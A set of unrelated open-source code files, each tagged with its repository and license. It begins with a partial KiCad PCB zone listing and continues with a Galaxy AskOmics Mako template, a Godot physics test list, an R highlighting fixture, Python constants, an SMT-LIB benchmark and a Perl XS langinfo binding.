(xy 64.090256 84.672795) (xy 63.901898 84.594774) (xy 63.791989 84.572912) (xy 63.780059 84.512935) (xy 63.702038 84.324577)
(xy 63.58877 84.155059) (xy 63.444607 84.010896) (xy 63.275089 83.897628) (xy 63.086731 83.819607) (xy 62.886772 83.779833)
(xy 62.682894 83.779833) (xy 62.482935 83.819607) (xy 62.294577 83.897628) (xy 62.125059 84.010896) (xy 62.097955 84.038)
(xy 60.188072 84.038) (xy 60.188072 83.725) (xy 60.175812 83.600518) (xy 60.175655 83.6) (xy 60.175812 83.599482)
(xy 60.188072 83.475) (xy 60.188072 82.925) (xy 60.175812 82.800518) (xy 60.175454 82.799337) (xy 60.185 82.68575)
(xy 60.092917 82.593667) (xy 60.080537 82.570506) (xy 60.001185 82.473815) (xy 59.911241 82.4) (xy 60.001185 82.326185)
(xy 60.080537 82.229494) (xy 60.092917 82.206333) (xy 60.185 82.11425) (xy 60.175454 82.000663) (xy 60.175812 81.999482)
(xy 60.188072 81.875) (xy 60.188072 81.325) (xy 60.186114 81.305118) (xy 60.410345 81.080887) (xy 60.439421 81.057025)
(xy 60.534644 80.940995) (xy 60.605401 80.808618) (xy 60.648973 80.664981) (xy 60.659999 80.553029) (xy 60.659999 80.553027)
(xy 60.663685 80.515604) (xy 60.659999 80.478181) (xy 60.659999 79.688072) (xy 60.775 79.688072) (xy 60.899482 79.675812)
(xy 60.9 79.675655) (xy 60.900518 79.675812) (xy 61.025 79.688072) (xy 61.575 79.688072) (xy 61.699482 79.675812)
(xy 61.7 79.675655) (xy 61.700518 79.675812) (xy 61.825 79.688072) (xy 62.375 79.688072) (xy 62.499482 79.675812)
(xy 62.5 79.675655) (xy 62.500518 79.675812) (xy 62.625 79.688072) (xy 63.175 79.688072) (xy 63.299482 79.675812)
(xy 63.3 79.675655) (xy 63.300518 79.675812) (xy 63.425 79.688072) (xy 63.975 79.688072) (xy 64.099482 79.675812)
(xy 64.1 79.675655) (xy 64.100518 79.675812) (xy 64.225 79.688072) (xy 64.775 79.688072) (xy 64.899482 79.675812)
(xy 64.900663 79.675454) (xy 65.01425 79.685) (xy 65.106333 79.592917) (xy 65.129494 79.580537) (xy 65.226185 79.501185)
(xy 65.3 79.411241)
)
)
)
(zone (net 73) (net_name GND) (layer F.Cu) (tstamp 5EE14213) (hatch edge 0.508)
(connect_pads (clearance 0.508))
(min_thickness 0.254)
(fill yes (arc_segments 32) (thermal_gap 0.508) (thermal_bridge_width 0.508))
(polygon
(pts
(xy 122.09 66.27) (xy 111.38 66.28) (xy 111.37 56.86) (xy 122.09 56.84)
)
)
(filled_polygon
(pts
(xy 121.237556 57.524984) (xy 121.286867 57.529819) (xy 121.303092 57.534718) (xy 121.318053 57.542672) (xy 121.331189 57.553386)
(xy 121.341988 57.566441) (xy 121.350049 57.581349) (xy 121.355062 57.597541) (xy 121.36 57.644525) (xy 121.36 58.586315)
(xy 121.316874 58.570881) (xy 121.142 58.697046) (xy 121.142 59.838) (xy 121.162 59.838) (xy 121.162 60.092)
(xy 121.142 60.092) (xy 121.142 61.232954) (xy 121.316874 61.359119) (xy 121.36 61.343685) (xy 121.36 62.516315)
(xy 121.316874 62.500881) (xy 121.142 62.627046) (xy 121.142 64.018) (xy 121.162 64.018) (xy 121.162 64.272)
(xy 121.142 64.272) (xy 121.142 65.662954) (xy 121.316874 65.789119) (xy 121.36 65.773685) (xy 121.36 66.143681)
(xy 120.77165 66.14423) (xy 120.775537 66.139494) (xy 120.834502 66.02918) (xy 120.870812 65.909482) (xy 120.883072 65.785)
(xy 120.882247 65.667104) (xy 120.888 65.662954) (xy 120.888 64.272) (xy 120.876867 64.272) (xy 120.870812 64.210518)
(xy 120.868 64.201248) (xy 120.868 64.018) (xy 120.888 64.018) (xy 120.888 62.627046) (xy 120.713126 62.500881)
(xy 120.490024 62.580724) (xy 120.302236 62.702631) (xy 120.157884 62.843206) (xy 120.039731 62.764259) (xy 119.865022 62.691892)
(xy 119.679552 62.655) (xy 119.490448 62.655) (xy 119.304978 62.691892) (xy 119.130269 62.764259) (xy 118.986651 62.860222)
(xy 118.914233 62.80079) (xy 118.770825 62.724136) (xy 118.615217 62.676933) (xy 118.493944 62.664989) (xy 118.493941 62.664989)
(xy 118.453391 62.660995) (xy 118.412841 62.664989) (xy 114.977159 62.664989) (xy 114.936608 62.660995) (xy 114.896058 62.664989)
(xy 114.896056 62.664989) (xy 114.774783 62.676933) (xy 114.619175 62.724136) (xy 114.475766 62.80079) (xy 114.438536 62.831344)
(xy 114.403349 62.860222) (xy 114.259731 62.764259) (xy 114.085022 62.691892) (xy 113.899552 62.655) (xy 113.710448 62.655)
(xy 113.524978 62.691892) (xy 113.350269 62.764259) (xy 113.232116 62.843206) (xy 113.087764 62.702631) (xy 112.899976 62.580724)
(xy 112.676874 62.500881) (xy 112.502 62.627046) (xy 112.502 64.018) (xy 112.522 64.018) (xy 112.522 64.201248)
(xy 112.519188 64.210518) (xy 112.513133 64.272) (xy 112.502 64.272) (xy 112.502 65.662954) (xy 112.507753 65.667104)
(xy 112.506928 65.785) (xy 112.519188 65.909482) (xy 112.555498 66.02918) (xy 112.614463 66.139494) (xy 112.624593 66.151837)
(xy 111.506865 66.152881) (xy 111.506103 65.435322) (xy 111.662236 65.587369) (xy 111.850024 65.709276) (xy 112.073126 65.789119)
(xy 112.248 65.662954) (xy 112.248 64.272) (xy 112.228 64.272) (xy 112.228 64.018) (xy 112.248 64.018)
(xy 112.248 62.627046) (xy 112.073126 62.500881) (xy 111.850024 62.580724) (xy 111.662236 62.702631) (xy 111.503367 62.857343)
(xy 111.501396 61.000524) (xy 111.501839 61.001169) (xy 111.662236 61.157369) (xy 111.850024 61.279276) (xy 112.073126 61.359119)
(xy 112.248 61.232954) (xy 112.248 60.092) (xy 112.502 60.092) (xy 112.502 61.232954) (xy 112.676874 61.359119)
(xy 112.899976 61.279276) (xy 113.087764 61.157369) (xy 113.248161 61.001169) (xy 113.375003 60.816678) (xy 113.463415 60.610987)
(xy 113.51 60.392) (xy 113.51 60.092) (xy 119.88 60.092) (xy 119.88 60.392) (xy 119.926585 60.610987)
(xy 120.014997 60.816678) (xy 120.141839 61.001169) (xy 120.302236 61.157369) (xy 120.490024 61.279276) (xy 120.713126 61.359119)
(xy 120.888 61.232954) (xy 120.888 60.092) (xy 119.88 60.092) (xy 113.51 60.092) (xy 112.502 60.092)
(xy 112.248 60.092) (xy 112.228 60.092) (xy 112.228 59.838) (xy 112.248 59.838) (xy 112.248 58.697046)
(xy 112.502 58.697046) (xy 112.502 59.838) (xy 113.51 59.838) (xy 113.51 59.538) (xy 119.88 59.538)
(xy 119.88 59.838) (xy 120.888 59.838) (xy 120.888 58.697046) (xy 120.713126 58.570881) (xy 120.490024 58.650724)
(xy 120.302236 58.772631) (xy 120.141839 58.928831) (xy 120.014997 59.113322) (xy 119.926585 59.319013) (xy 119.88 59.538)
(xy 113.51 59.538) (xy 113.463415 59.319013) (xy 113.375003 59.113322) (xy 113.248161 58.928831) (xy 113.087764 58.772631)
(xy 112.899976 58.650724) (xy 112.676874 58.570881) (xy 112.502 58.697046) (xy 112.248 58.697046) (xy 112.073126 58.570881)
(xy 111.850024 58.650724) (xy 111.662236 58.772631) (xy 111.501839 58.928831) (xy 111.499201 58.932669) (xy 111.497702 57.520458)
)
)
)
(zone (net 34) (net_name VSS) (layer F.Cu) (tstamp 5EE14210) (hatch edge 0.508)
(connect_pads (clearance 0.508))
(min_thickness 0.254)
(fill yes (arc_segments 32) (thermal_gap 0.508) (thermal_bridge_width 0.508))
(polygon
(pts
(xy 141.52 56.88) (xy 142.59 56.88) (xy 142.59 83.9) (xy 129.97 83.83) (xy 129.86 56.87)
)
)
(filled_polygon
(pts
(xy 131.302 76.323) (xy 131.322 76.323) (xy 131.322 76.577) (xy 131.302 76.577) (xy 131.302 77.62625)
(xy 131.46075 77.785) (xy 131.700235 77.787543) (xy 131.667818 77.848192) (xy 131.585764 78.118691) (xy 131.558057 78.4)
(xy 131.585764 78.681309) (xy 131.667818 78.951808) (xy 131.801068 79.201101) (xy 131.980392 79.419608) (xy 132.198899 79.598932)
(xy 132.448192 79.732182) (xy 132.718691 79.814236) (xy 132.929508 79.835) (xy 133.470492 79.835) (xy 133.681309 79.814236)
(xy 133.951808 79.732182) (xy 134.201101 79.598932) (xy 134.28171 79.532778) (xy 134.894481 80.145549) (xy 134.920334 80.177051)
(xy 135.046033 80.280209) (xy 135.189441 80.356863) (xy 135.345049 80.404066) (xy 135.466322 80.41601) (xy 135.466324 80.41601)
(xy 135.506874 80.420004) (xy 135.547425 80.41601) (xy 136.852575 80.41601) (xy 136.893125 80.420004) (xy 136.933675 80.41601)
(xy 136.933678 80.41601) (xy 137.054951 80.404066) (xy 137.210559 80.356863) (xy 137.353967 80.280209) (xy 137.479666 80.177051)
(xy 137.505523 80.145544) (xy 138.67877 78.972298) (xy 138.801068 79.201101) (xy 138.980392 79.419608) (xy 139.198899 79.598932)
(xy 139.448192 79.732182) (xy 139.718691 79.814236) (xy 139.929508 79.835) (xy 140.470492 79.835) (xy 140.681309 79.814236)
(xy 140.951808 79.732182) (xy 141.201101 79.598932) (xy 141.419608 79.419608) (xy 141.598932 79.201101) (xy 141.732182 78.951808)
(xy 141.814236 78.681309) (xy 141.841943 78.4) (xy 141.814236 78.118691) (xy 141.732182 77.848192) (xy 141.68423 77.75848)
(xy 141.71075 77.785) (xy 141.91001 77.787116) (xy 141.910011 81.621401) (xy 141.652887 81.568063) (xy 141.427 81.720526)
(xy 141.427 82.873) (xy 141.447 82.873) (xy 141.447 83.127) (xy 141.427 83.127) (xy 141.427 83.147)
(xy 141.173 83.147) (xy 141.173 83.127) (xy 139.830085 83.127) (xy 139.708096 83.349039) (xy 139.718556 83.40673)
(xy 139.824449 83.668421) (xy 139.883238 83.757985) (xy 130.621947 83.706615) (xy 130.609996 83.251186) (xy 130.609762 82.650961)
(xy 139.708096 82.650961) (xy 139.830085 82.873) (xy 141.173 82.873) (xy 141.173 81.720526) (xy 140.947113 81.568063)
(xy 140.670694 81.625404) (xy 140.410773 81.73557) (xy 140.177338 81.894327) (xy 139.979361 82.095575) (xy 139.824449 82.331579)
(xy 139.718556 82.59327) (xy 139.708096 82.650961) (xy 130.609762 82.650961) (xy 130.609123 81.012397) (xy 130.682795 81.190256)
(xy 130.796063 81.359774) (xy 130.940226 81.503937) (xy 131.109744 81.617205) (xy 131.298102 81.695226) (xy 131.498061 81.735)
(xy 131.701939 81.735) (xy 131.901898 81.695226) (xy 132.090256 81.617205) (xy 132.259774 81.503937) (xy 132.403937 81.359774)
(xy 132.517205 81.190256) (xy 132.595226 81.001898) (xy 132.635 80.801939) (xy 132.635 80.598061) (xy 137.565 80.598061)
(xy 137.565 80.801939) (xy 137.604774 81.001898) (xy 137.682795 81.190256) (xy 137.796063 81.359774) (xy 137.940226 81.503937)
(xy 138.109744 81.617205) (xy 138.298102 81.695226) (xy 138.498061 81.735) (xy 138.701939 81.735) (xy 138.901898 81.695226)
(xy 139.090256 81.617205) (xy 139.259774 81.503937) (xy 139.403937 81.359774) (xy 139.517205 81.190256) (xy 139.595226 81.001898)
(xy 139.635 80.801939) (xy 139.635 80.598061) (xy 139.595226 80.398102) (xy 139.517205 80.209744) (xy 139.403937 80.040226)
(xy 139.259774 79.896063) (xy 139.090256 79.782795) (xy 138.901898 79.704774) (xy 138.701939 79.665) (xy 138.498061 79.665)
(xy 138.298102 79.704774) (xy 138.109744 79.782795) (xy 137.940226 79.896063) (xy 137.796063 80.040226) (xy 137.682795 80.209744)
(xy 137.604774 80.398102) (xy 137.565 80.598061) (xy 132.635 80.598061) (xy 132.595226 80.398102) (xy 132.517205 80.209744)
(xy 132.403937 80.040226) (xy 132.259774 79.896063) (xy 132.090256 79.782795) (xy 131.901898 79.704774) (xy 131.701939 79.665)
(xy 131.498061 79.665) (xy 131.298102 79.704774) (xy 131.109744 79.782795) (xy 130.940226 79.896063) (xy 130.796063 80.040226)
(xy 130.682795 80.209744) (xy 130.60888 80.38819) (xy 130.607866 77.787988) (xy 130.88925 77.785) (xy 131.048 77.62625)
(xy 131.048 76.577) (xy 131.028 76.577) (xy 131.028 76.323) (xy 131.048 76.323) (xy 131.048 76.303)
(xy 131.302 76.303)
)
)
(filled_polygon
(pts
(xy 141.447 71.728) (xy 141.467 71.728) (xy 141.467 71.982) (xy 141.447 71.982) (xy 141.447 72.998)
(xy 141.467 72.998) (xy 141.467 73.252) (xy 141.447 73.252) (xy 141.447 74.268) (xy 141.467 74.268)
(xy 141.467 74.522) (xy 141.447 74.522) (xy 141.447 75.17125) (xy 141.552 75.27625) (xy 141.552 76.323)
(xy 141.572 76.323) (xy 141.572 76.577) (xy 141.552 76.577) (xy 141.552 76.597) (xy 141.298 76.597)
(xy 141.298 76.577) (xy 141.278 76.577) (xy 141.278 76.323) (xy 141.298 76.323) (xy 141.298 75.27375)
(xy 141.193 75.16875) (xy 141.193 74.522) (xy 139.81875 74.522) (xy 139.66 74.68075) (xy 139.656928 74.695)
(xy 139.669188 74.819482) (xy 139.705498 74.93918) (xy 139.764463 75.049494) (xy 139.825875 75.124326) (xy 139.700001 75.111928)
(xy 139.049999 75.111928) (xy 138.876745 75.128992) (xy 138.710149 75.179528) (xy 138.556613 75.261595) (xy 138.422038 75.372038)
(xy 138.35 75.459816) (xy 138.277962 75.372038) (xy 138.143387 75.261595) (xy 137.989851 75.179528) (xy 137.823255 75.128992)
(xy 137.650001 75.111928) (xy 136.999999 75.111928) (xy 136.989687 75.112944) (xy 138.677631 73.425) (xy 139.656928 73.425)
(xy 139.669188 73.549482) (xy 139.705498 73.66918) (xy 139.754043 73.76) (xy 139.705498 73.85082) (xy 139.669188 73.970518)
(xy 139.656928 74.095) (xy 139.66 74.10925) (xy 139.81875 74.268) (xy 141.193 74.268) (xy 141.193 73.252)
(xy 139.81875 73.252) (xy 139.66 73.41075) (xy 139.656928 73.425) (xy 138.677631 73.425) (xy 139.705022 72.397609)
(xy 139.705498 72.39918) (xy 139.754043 72.49) (xy 139.705498 72.58082) (xy 139.669188 72.700518) (xy 139.656928 72.825)
(xy 139.66 72.83925) (xy 139.81875 72.998) (xy 141.193 72.998) (xy 141.193 71.982) (xy 141.173 71.982)
(xy 141.173 71.728) (xy 141.193 71.728) (xy 141.193 71.708) (xy 141.447 71.708)
)
)
(filled_polygon
(pts
(xy 132.147 69.188) (xy 132.167 69.188) (xy 132.167 69.442) (xy 132.147 69.442) (xy 132.147 69.462)
(xy 131.893 69.462) (xy 131.893 69.442) (xy 131.873 69.442) (xy 131.873 69.188) (xy 131.893 69.188)
(xy 131.893 69.168) (xy 132.147 69.168)
)
)
)
(zone (net 73) (net_name GND) (layer F.Cu) (tstamp 0) (hatch edge 0.508)
(connect_pads (clearance 0.508))
(min_thickness 0.254)
(fill yes (arc_segments 32) (thermal_gap 0.508) (thermal_bridge_width 0.508))
(polygon
(pts
(xy 58.21 87.91) (xy 49.92 87.91) (xy 49.92 78.04) (xy 58.21 78.04)
)
)
(filled_polygon
(pts
(xy 52.411595 78.176613) (xy 52.329528 78.330149) (xy 52.278992 78.496745) (xy 52.261928 78.669999) (xy 52.261928 79.570001)
(xy 52.278992 79.743255) (xy 52.329528 79.909851) (xy 52.411595 80.063387) (xy 52.522038 80.197962) (xy 52.656613 80.308405)
(xy 52.810149 80.390472) (xy 52.888001 80.414088) (xy 52.888001 80.535569) (xy 52.80582 80.560498) (xy 52.695506 80.619463)
(xy 52.598815 80.698815) (xy 52.519463 80.795506) (xy 52.460498 80.90582) (xy 52.424188 81.025518) (xy 52.411928 81.15)
(xy 52.411928 82.55) (xy 52.424188 82.674482) (xy 52.460498 82.79418) (xy 52.519463 82.904494) (xy 52.556809 82.95)
(xy 52.519463 82.995506) (xy 52.460498 83.10582) (xy 52.424188 83.225518) (xy 52.411928 83.35) (xy 52.415 83.76425)
(xy 52.57375 83.923) (xy 53.523 83.923) (xy 53.523 83.903) (xy 53.777 83.903) (xy 53.777 83.923)
(xy 53.797 83.923) (xy 53.797 84.177) (xy 53.777 84.177) (xy 53.777 85.22625) (xy 53.93575 85.385)
(xy 54.25 85.388072) (xy 54.374482 85.375812) (xy 54.49418 85.339502) (xy 54.5 85.336391) (xy 54.50582 85.339502)
(xy 54.625518 85.375812) (xy 54.75 85.388072) (xy 54.763001 85.388072) (xy 54.763 85.621455) (xy 54.706613 85.651595)
(xy 54.572038 85.762038) (xy 54.566658 85.768594) (xy 54.501185 85.688815) (xy 54.404494 85.609463) (xy 54.29418 85.550498)
(xy 54.174482 85.514188) (xy 54.05 85.501928) (xy 53.76075 85.505) (xy 53.602 85.66375) (xy 53.602 86.713)
(xy 53.622 86.713) (xy 53.622 86.967) (xy 53.602 86.967) (xy 53.602 86.987) (xy 53.348 86.987)
(xy 53.348 86.967) (xy 52.42375 86.967) (xy 52.265 87.12575) (xy 52.261928 87.54) (xy 52.274188 87.664482)
(xy 52.31014 87.783) (xy 50.047 87.783) (xy 50.047 86.14) (xy 52.261928 86.14) (xy 52.265 86.55425)
(xy 52.42375 86.713) (xy 53.348 86.713) (xy 53.348 85.66375) (xy 53.18925 85.505) (xy 52.9 85.501928)
(xy 52.775518 85.514188) (xy 52.65582 85.550498) (xy 52.545506 85.609463) (xy 52.448815 85.688815) (xy 52.369463 85.785506)
(xy 52.310498 85.89582) (xy 52.274188 86.015518) (xy 52.261928 86.14) (xy 50.047 86.14) (xy 50.047 84.75)
(xy 52.411928 84.75) (xy 52.424188 84.874482) (xy 52.460498 84.99418) (xy 52.519463 85.104494) (xy 52.598815 85.201185)
(xy 52.695506 85.280537) (xy 52.80582 85.339502) (xy 52.925518 85.375812) (xy 53.05 85.388072) (xy 53.36425 85.385)
(xy 53.523 85.22625) (xy 53.523 84.177) (xy 52.57375 84.177) (xy 52.415 84.33575) (xy 52.411928 84.75)
(xy 50.047 84.75) (xy 50.047 78.167) (xy 52.419484 78.167)
)
)
(filled_polygon
(pts
(xy 57.411928 85.075) (xy 57.424188 85.199482) (xy 57.424345 85.2) (xy 57.424188 85.200518) (xy 57.411928 85.325)
(xy 57.411928 85.875) (xy 57.424188 85.999482) (xy 57.424345 86) (xy 57.424188 86.000518) (xy 57.411928 86.125)
(xy 57.411928 86.675) (xy 57.424188 86.799482) (xy 57.424345 86.8) (xy 57.424188 86.800518) (xy 57.411928 86.925)
(xy 57.411928 87.475) (xy 57.424188 87.599482) (xy 57.424345 87.6) (xy 57.424188 87.600518) (xy 57.411928 87.725)
(xy 57.411928 87.783) (xy 56.588612 87.783) (xy 56.670472 87.629851) (xy 56.721008 87.463255) (xy 56.738072 87.290001)
(xy 56.738072 86.389999) (xy 56.721008 86.216745) (xy 56.670472 86.050149) (xy 56.588405 85.896613) (xy 56.477962 85.762038)
(xy 56.343387 85.651595) (xy 56.287 85.621455) (xy 56.287 85.289888) (xy 56.304494 85.280537) (xy 56.401185 85.201185)
(xy 56.480537 85.104494) (xy 56.539502 84.99418) (xy 56.575812 84.874482) (xy 56.58689 84.762) (xy 57.411928 84.762)
)
)
(filled_polygon
(pts
(xy 56.6316 83.238) (xy 56.577041 83.238) (xy 56.575812 83.225518) (xy 56.556955 83.163354)
)
)
(filled_polygon
(pts
(xy 55.477 81.723) (xy 55.497 81.723) (xy 55.497 81.977) (xy 55.477 81.977) (xy 55.477 81.997)
(xy 55.223 81.997) (xy 55.223 81.977) (xy 55.203 81.977) (xy 55.203 81.723) (xy 55.223 81.723)
(xy 55.223 81.703) (xy 55.477 81.703)
)
)
(filled_polygon
(pts
(xy 56.834 78.406433) (xy 56.833999 80.367767) (xy 56.776885 80.310653) (xy 56.753023 80.281577) (xy 56.636993 80.186354)
(xy 56.62574 80.180339) (xy 56.630537 80.174494) (xy 56.689502 80.06418) (xy 56.725812 79.944482) (xy 56.738072 79.82)
(xy 56.735 79.40575) (xy 56.57625 79.247) (xy 55.652 79.247) (xy 55.652 79.267) (xy 55.398 79.267)
(xy 55.398 79.247) (xy 55.378 79.247) (xy 55.378 78.993) (xy 55.398 78.993) (xy 55.398 78.973)
(xy 55.652 78.973) (xy 55.652 78.993) (xy 56.57625 78.993) (xy 56.735 78.83425) (xy 56.738072 78.42)
(xy 56.72611 78.298543)
)
)
)
(zone (net 73) (net_name GND) (layer B.Cu) (tstamp 5EE149CF) (hatch edge 0.508)
(connect_pads (clearance 0.508))
(min_thickness 0.254)
(fill yes (arc_segments 32) (thermal_gap 0.508) (thermal_bridge_width 0.508))
(polygon
(pts
(xy 58.21 87.91) (xy 49.92 87.91) (xy 49.92 78.04) (xy 58.21 78.04)
)
)
(filled_polygon
(pts
(xy 54.756063 78.179774) (xy 54.900226 78.323937) (xy 55.069744 78.437205) (xy 55.258102 78.515226) (xy 55.458061 78.555)
(xy 55.661939 78.555) (xy 55.861898 78.515226) (xy 56.050256 78.437205) (xy 56.219774 78.323937) (xy 56.363937 78.179774)
(xy 56.372472 78.167) (xy 58.083 78.167) (xy 58.083 87.08399) (xy 50.571621 87.08399) (xy 50.047 86.559369)
(xy 50.047 78.167) (xy 54.747528 78.167)
)
)
)
)
| KiCad | 4 | ankitp4t3l/ferris | 0.1/base/ferris.kicad_pcb | [
"CC0-1.0"
] |
<%namespace name="ie" file="ie.mako" />
<%
import random
import string
# Sets ID and sets up a lot of other variables
ie_request.load_deploy_config()
# get an API key for AskOmics
askomics_api_key = ie_request.notebook_pw
# Get ids of selected datasets
additional_ids = trans.request.params.get('additional_dataset_ids', None)
if not additional_ids:
additional_ids = str(trans.security.encode_id( hda.id ) )
else:
additional_ids += "," + trans.security.encode_id( hda.id )
# Launch the IE. This builds and runs the docker command in the background.
ie_request.launch(
additional_ids=additional_ids if ie_request.use_volumes else None,
env_override={
'ASKO_load_url': 'http://localhost:6543',
'ASKOMICS_API_KEY': askomics_api_key,
'ASKO_files_dir': '/tmp/askomics-ie',
'VIRT_Parameters_NumberOfBuffers': 10000, # see https://github.com/xgaia/askomics-docker-compose/tree/master/virtuoso#virtuoso for this values
'VIRT_Parameters_MaxDirtyBuffers': 6000
}
)
# Only once the container is launched can we template our URLs. The ie_request
# doesn't have all of the information needed until the container is running.
url = ie_request.url_template('${PROXY_URL}/login_api_gie?key=' + askomics_api_key)
%>
<html>
<head>
${ ie.load_default_js() }
${ ie.load_default_app() }
</head>
<body>
<script type="text/javascript">
${ ie.default_javascript_variables() }
var url = '${ url }';
load_askomics(url);
</script>
<div id="main" width="100%" height="100%">
</div>
</body>
</html>
| Mako | 4 | rikeshi/galaxy | config/plugins/interactive_environments/askomics/templates/askomics.mako | [
"CC-BY-3.0"
] |
extends Node
var _tests = [
{
"id": "Functional Tests/Shapes",
"path": "res://tests/functional/test_shapes.tscn",
},
{
"id": "Functional Tests/Box Stack",
"path": "res://tests/functional/test_stack.tscn",
},
{
"id": "Functional Tests/Box Pyramid",
"path": "res://tests/functional/test_pyramid.tscn",
},
{
"id": "Functional Tests/Collision Pairs",
"path": "res://tests/functional/test_collision_pairs.tscn",
},
{
"id": "Functional Tests/Character - Slopes",
"path": "res://tests/functional/test_character_slopes.tscn",
},
{
"id": "Functional Tests/Character - Tilemap",
"path": "res://tests/functional/test_character_tilemap.tscn",
},
{
"id": "Functional Tests/Character - Pixels",
"path": "res://tests/functional/test_character_pixels.tscn",
},
{
"id": "Functional Tests/One Way Collision",
"path": "res://tests/functional/test_one_way_collision.tscn",
},
{
"id": "Functional Tests/Joints",
"path": "res://tests/functional/test_joints.tscn",
},
{
"id": "Functional Tests/Raycasting",
"path": "res://tests/functional/test_raycasting.tscn",
},
{
"id": "Performance Tests/Broadphase",
"path": "res://tests/performance/test_perf_broadphase.tscn",
},
{
"id": "Performance Tests/Contacts",
"path": "res://tests/performance/test_perf_contacts.tscn",
},
{
"id" : "Performance Tests/Contact Islands",
"path" : "res://tests/performance/test_perf_contact_islands.tscn",
},
]
func _ready():
var test_menu = $TestsMenu
for test in _tests:
test_menu.add_test(test.id, test.path)
| GDScript | 4 | jonbonazza/godot-demo-projects | 2d/physics_tests/tests.gd | [
"MIT"
] |
# © Microsoft. All rights reserved.
#' Add together two numbers.
#'
#' @param x A number.
#' @param y A number.
#' @return The sum of \code{x} and \code{y}.
#' @examples
#' add(1, 1)
#' add(10, 1)
add <- function(x, y) {
x + y
}
add(1, -2, 2.0)
add(1.0e10, 2.0e10)
paste("one", NULL)
paste(NA, 'two')
paste("multi-
line",
'multi-
line')
| R | 4 | sbj42/vscode | extensions/vscode-colorize-tests/test/colorize-fixtures/test.r | [
"MIT"
] |
"""Constants for the Co2signal integration."""
DOMAIN = "co2signal"
CONF_COUNTRY_CODE = "country_code"
ATTRIBUTION = "Data provided by CO2signal"
| Python | 2 | MrDelik/core | homeassistant/components/co2signal/const.py | [
"Apache-2.0"
] |
(set-info :smt-lib-version 2.6)
(set-logic QF_UFLRA)
(set-info :source |CPAchecker with k-induction on SV-COMP14 program using MathSAT5, submitted by Philipp Wendler, http://cpachecker.sosy-lab.org|)
(set-info :category "industrial")
(set-info :status sat)
(define-fun _1 () Bool true)
(declare-fun ___pc@1 () Real)
(define-fun _7 () Real 0)
(define-fun _14 () Real 17)
(define-fun _237 () Real ___pc@1)
(define-fun _238 () Bool (= _237 _14))
(define-fun _240 () Bool (not _238))
(define-fun _241 () Bool (= _237 _7))
(define-fun _244 () Bool (not _241))
(define-fun _245 () Bool (and _240 _244))
(define-fun _246 () Real 23)
(define-fun _247 () Bool (= _237 _246))
(define-fun _250 () Bool (not _247))
(define-fun _251 () Bool (and _245 _250))
(define-fun _252 () Real 10)
(define-fun _253 () Bool (= _237 _252))
(define-fun _256 () Bool (not _253))
(define-fun _257 () Bool (and _251 _256))
(define-fun _258 () Real 16)
(define-fun _259 () Bool (= _237 _258))
(define-fun _262 () Bool (not _259))
(define-fun _263 () Bool (and _257 _262))
(define-fun _264 () Real 9)
(define-fun _265 () Bool (= _237 _264))
(define-fun _268 () Bool (not _265))
(define-fun _269 () Bool (and _263 _268))
(define-fun _270 () Real 15)
(define-fun _271 () Bool (= _237 _270))
(define-fun _274 () Bool (not _271))
(define-fun _275 () Bool (and _269 _274))
(define-fun _276 () Real 8)
(define-fun _277 () Bool (= _237 _276))
(define-fun _280 () Bool (not _277))
(define-fun _281 () Bool (and _275 _280))
(define-fun _282 () Real 14)
(define-fun _283 () Bool (= _237 _282))
(define-fun _286 () Bool (not _283))
(define-fun _287 () Bool (and _281 _286))
(define-fun _288 () Real 7)
(define-fun _289 () Bool (= _237 _288))
(define-fun _292 () Bool (not _289))
(define-fun _293 () Bool (and _287 _292))
(define-fun _294 () Real 13)
(define-fun _295 () Bool (= _237 _294))
(define-fun _298 () Bool (not _295))
(define-fun _299 () Bool (and _293 _298))
(define-fun _300 () Real 6)
(define-fun _301 () Bool (= _237 _300))
(define-fun _304 () Bool (not _301))
(define-fun _305 () Bool (and _299 _304))
(define-fun _306 () Real 12)
(define-fun _307 () Bool (= _237 _306))
(define-fun _310 () Bool (not _307))
(define-fun _311 () Bool (and _305 _310))
(define-fun _312 () Real 22)
(define-fun _313 () Bool (= _237 _312))
(define-fun _316 () Bool (not _313))
(define-fun _317 () Bool (and _311 _316))
(define-fun _318 () Real 5)
(define-fun _319 () Bool (= _237 _318))
(define-fun _322 () Bool (not _319))
(define-fun _323 () Bool (and _317 _322))
(define-fun _324 () Real 28)
(define-fun _325 () Bool (= _237 _324))
(define-fun _328 () Bool (not _325))
(define-fun _329 () Bool (and _323 _328))
(define-fun _330 () Real 21)
(define-fun _331 () Bool (= _237 _330))
(define-fun _334 () Bool (not _331))
(define-fun _335 () Bool (and _329 _334))
(define-fun _336 () Real 4)
(define-fun _337 () Bool (= _237 _336))
(define-fun _340 () Bool (not _337))
(define-fun _341 () Bool (and _335 _340))
(define-fun _342 () Real 27)
(define-fun _343 () Bool (= _237 _342))
(define-fun _346 () Bool (not _343))
(define-fun _347 () Bool (and _341 _346))
(define-fun _348 () Real 20)
(define-fun _349 () Bool (= _237 _348))
(define-fun _352 () Bool (not _349))
(define-fun _353 () Bool (and _347 _352))
(define-fun _354 () Real 3)
(define-fun _355 () Bool (= _237 _354))
(define-fun _358 () Bool (not _355))
(define-fun _359 () Bool (and _353 _358))
(define-fun _360 () Real 26)
(define-fun _361 () Bool (= _237 _360))
(define-fun _364 () Bool (not _361))
(define-fun _365 () Bool (and _359 _364))
(define-fun _366 () Real 19)
(define-fun _367 () Bool (= _237 _366))
(define-fun _370 () Bool (not _367))
(define-fun _371 () Bool (and _365 _370))
(define-fun _372 () Real 2)
(define-fun _373 () Bool (= _237 _372))
(define-fun _375 () Bool (and _371 _373))
(assert _1)
(assert _375)
(check-sat)
(exit)
| SMT | 2 | livinlife6751/infer | sledge/test/smt/QF_UFLRA/cpachecker-induction-svcomp14/cpachecker-induction.m0_true-unreach-call_drivers-staging-comedi-drivers-ni_pcidio-ko--107_1a--adbbc36.c.smt2 | [
"MIT"
] |
#include "EXTERN.h"
#include "perl.h"
#include "XSUB.h"
#ifdef I_LANGINFO
# define __USE_GNU 1 /* Enables YESSTR, otherwise only __YESSTR. */
# include <langinfo.h>
#endif
#include "const-c.inc"
MODULE = I18N::Langinfo PACKAGE = I18N::Langinfo
PROTOTYPES: ENABLE
INCLUDE: const-xs.inc
SV*
langinfo(code)
int code
CODE:
#ifdef HAS_NL_LANGINFO
{
char *s;
if ((s = nl_langinfo(code)))
RETVAL = newSVpvn(s, strlen(s));
else
RETVAL = &PL_sv_undef;
}
#else
croak("nl_langinfo() not implemented on this architecture");
#endif
OUTPUT:
RETVAL
| XS | 3 | vlinhd11/vlinhd11-android-scripting | perl/src/ext/I18N-Langinfo/Langinfo.xs | [
"Apache-2.0"
] |
